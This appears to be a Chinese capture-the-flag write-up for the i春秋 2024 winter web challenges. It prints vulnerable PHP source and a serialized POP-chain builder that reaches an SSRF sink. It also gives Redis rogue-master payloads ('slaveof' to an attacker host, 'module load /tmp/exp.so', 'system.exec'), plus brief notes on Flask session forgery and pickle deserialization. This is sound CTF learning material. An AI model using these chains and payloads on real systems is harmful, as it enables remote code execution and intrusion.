
I春秋2024冬

web1 - EZphp

题目源码不能在一页内完整展示，差评。

不然打 POP 链的时候翻来翻去很麻烦。

缩进后代码如下

<?php
// Source disclosure is intentional: the challenge prints its own code so the
// gadget classes below can be read by the player.
highlight_file(__FILE__);
// function.php is not shown on this page. get() used by the chain is defined in
// this file, so whatever function.php contributes cannot be determined from here.
include "function.php";
class Rd{
    public $ending;
    public $cl;
    public $poc;

    // Runs when the object is torn down; output only, no state change.
    public function __destruct(){
        echo "All matters have concluded</br>";
    }

    // Gadget: any call to an undefined method on an Rd lands here. $name is
    // ignored completely. If the FIRST argument is an array whose 'POC' entry
    // loosely (==) equals "0.o", a write to $this->cl->var1 is performed, which
    // fires __set on whatever object $cl holds (Er, in the chain on this page).
    public function __call($name, $arg){
        foreach ($arg as $idx => $unused) {
            // Note: every iteration tests $arg[0], not the current element,
            // so the body is repeated once per argument with the same outcome.
            if ($arg[0]['POC'] != "0.o") {
                continue;
            }
            $this->cl->var1 = "get";
        }
    }
}

class Poc{
    public $payload;
    public $fun;

    // Writing any undeclared property records the property name in $payload
    // and the assigned value in $fun.
    public function __set($name, $value) {
        [$this->payload, $this->fun] = [$name, $value];
    }

    // Prints a banner, then reads the given path/URL with file_get_contents and
    // discards the result (nothing from the read is echoed). The parameter name
    // keeps the original spelling ($paylaod) for compatibility. Not referenced by
    // the POP chain shown on this page.
    function getflag($paylaod){
        echo "Have you genuinely accomplished what you set out to do?</br>";
        file_get_contents($paylaod);
    }
}

class Er{
    public $symbol;
    public $Flag;

    // Only runs on `new`; unserialize() does not invoke it.
    public function __construct(){
        $this->symbol = true;
    }

    // Sink of the chain: writing any undeclared property calls $value as a
    // function with $this->Flag as its argument. $name is ignored.
    // The check runs on the base64-DECODED Flag, but the callee receives the
    // still-encoded Flag. The scheme group in the regex is optional, so any
    // decoded value containing "://" at the start (after an optional scheme) passes.
    public function __set($name, $value){
        $decoded = base64_decode($this->Flag);
        $looksLikeUrl = preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/', $decoded);
        if (!$looksLikeUrl) {
            echo "NoNoNo,please you can look hint.php</br>";
            return;
        }
        $value($this->Flag);
    }
}

class Ha{
    public $start;
    public $start1;
    public $start2;

    // Only runs on `new`, never on unserialize(); prints start1 stringified.
    public function __construct(){
        echo $this->start1 . "__construct</br>";
    }

    // Entry point of the chain: on destruction, when start2 is exactly "o.0",
    // calls the undefined method Love() on start1 with start as its argument,
    // which routes into start1's __call (Rd in the chain on this page).
    public function __destruct(){
        if ($this->start2 !== "o.0") {
            return;
        }
        $this->start1->Love($this->start);
        echo "You are Good!</br>";
    }
}

// SSRF sink: fetches a caller-chosen URL with curl and dumps everything it learns
// (decoded URL, curl_getinfo() metadata, response body). $url arrives base64-encoded;
// in the chain on this page it is the still-encoded Er::$Flag.
// No scheme/host restriction is applied. Whether non-HTTP schemes such as gopher://
// are actually followed depends on the libcurl build and PHP's CURLOPT_PROTOCOLS
// default — confirm against the target before relying on it.
function get($url) {
    $decoded = base64_decode($url);
    var_dump($decoded);
    $handle = curl_init();
    curl_setopt_array($handle, [
        CURLOPT_URL => $decoded,
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_HEADER => 0,
    ]);
    $body = curl_exec($handle);
    $info = curl_getinfo($handle);
    var_dump($info);
    curl_close($handle);
    var_dump($body);
}

// SECURITY: unserialize() on raw POST data. The sender controls the entire object
// graph, so every class above with a magic method (__destruct, __call, __set)
// becomes a gadget — this is the intended entry point of the challenge. Real code
// should never unserialize() untrusted input; use json_decode() instead.
if (isset($_POST['pop'])) {
$a = unserialize($_POST['pop']);} else {
die("You are Silly goose!");}
?>

POP链+SSRF

POP

POP 这边不难：Ha::__destruct 在 start2 === "o.0" 时调用 start1 上不存在的 Love()，进入 Rd::__call；__call 里的 `$this->cl->var1 = "get"` 触发 Er::__set，此时 name=var1、value=get；最后 `$value($this->Flag)` 就是调用外面的 get() 函数打 SSRF。注意属性名是大写的 Flag，而且 Er::__set 里的正则检查的是 base64 解码后的值，传给 get() 的仍是 base64 原文（get() 自己再解一次）。

// Build the object graph Ha -> Rd -> Er and print its serialization.
// Ha::__destruct -> Rd::__call (via undefined Love()) -> Er::__set -> get($Flag).
$sink = new Er();
// Flag must be the base64 of the SSRF target URL (a gopher:// URL to hit redis
// in this challenge); Er's regex checks the decoded form, get() decodes it again.
$sink->Flag = "payload+base64";

$gadget = new Rd();
$gadget->cl = $sink;

$a = new Ha();
$a->start2 = "o.0";
$a->start = array("POC" => "0.o");
$a->start1 = $gadget;

echo serialize($a);

SSRF

// The SSRF sink reached by the chain. Decodes the base64 URL, fetches it with curl
// with no scheme or host restriction, and var_dumps the decoded URL, the
// curl_getinfo() metadata and the response body back to the caller — so this is a
// full-response (non-blind) SSRF. Whether gopher:// is followed depends on the
// libcurl build and PHP's CURLOPT_PROTOCOLS default on the target.
function get($url) {
    $decoded = base64_decode($url);
    var_dump($decoded);
    $handle = curl_init();
    curl_setopt_array($handle, [
        CURLOPT_URL => $decoded,
        CURLOPT_RETURNTRANSFER => 1,
        CURLOPT_HEADER => 0,
    ]);
    $body = curl_exec($handle);
    $info = curl_getinfo($handle);
    var_dump($info);
    curl_close($handle);
    var_dump($body);
}

$url 就是刚才传入的 Flag（Er::__set 只用它的 base64 解码结果做正则检查，get() 自己再解码一次），中间没有任何 waf，是直接的、有回显的 SSRF。另外正则里 `(http|https|gopher|dict)?` 是可选的，所以解码后只要以 `://` 开头（前面可有可无 scheme）就能过检查。

hint.php告诉是127地址

只有 /tmp 可写，所以走 redis 主从复制：先 slaveof 到攻击机上的恶意主节点、把 dir/dbfilename 设成 /tmp/exp.so 让同步下来的数据落地成模块文件，再 module load 加载并执行 env 读取环境变量。

# Stage 1: make the target redis replicate from the attacker's rogue master
# (replace `ip` with the attacker host; the rogue master listens on 21000) and
# point the RDB dump at /tmp/exp.so so the synced payload lands there as a
# loadable module. The leading "\n" from the original heredoc is kept on purpose.
# To deliver via the PHP chain these commands still have to be wrapped into a
# gopher:// URL (CRLF percent-encoded) and then base64-encoded into Flag.
payload1 = "\n" + "\n".join([
    "slaveof ip 21000",
    "config set dir /tmp",
    "config set dbfilename exp.so",
    "quit",
]) + "\n"

# Stage 2: detach from the rogue master, load the module and run `env`.
# `system.exec` is the command exposed by the exp.so module used in this write-up.
payload2 = "\n".join([
    "slaveof no one",
    "module load /tmp/exp.so",
    "system.exec 'env'",
    "quit",
]) + "\n"

picup (unsolved)

如果能找到环境的话复现一下

flask session

然后 app.secret_key = users.passwords['admin'] = hashlib.md5(os.urandom(32)).hexdigest()，即 session 密钥和 admin 密码是同一个随机值。

读 /proc/self/maps

pic 处打 pickle 反序列化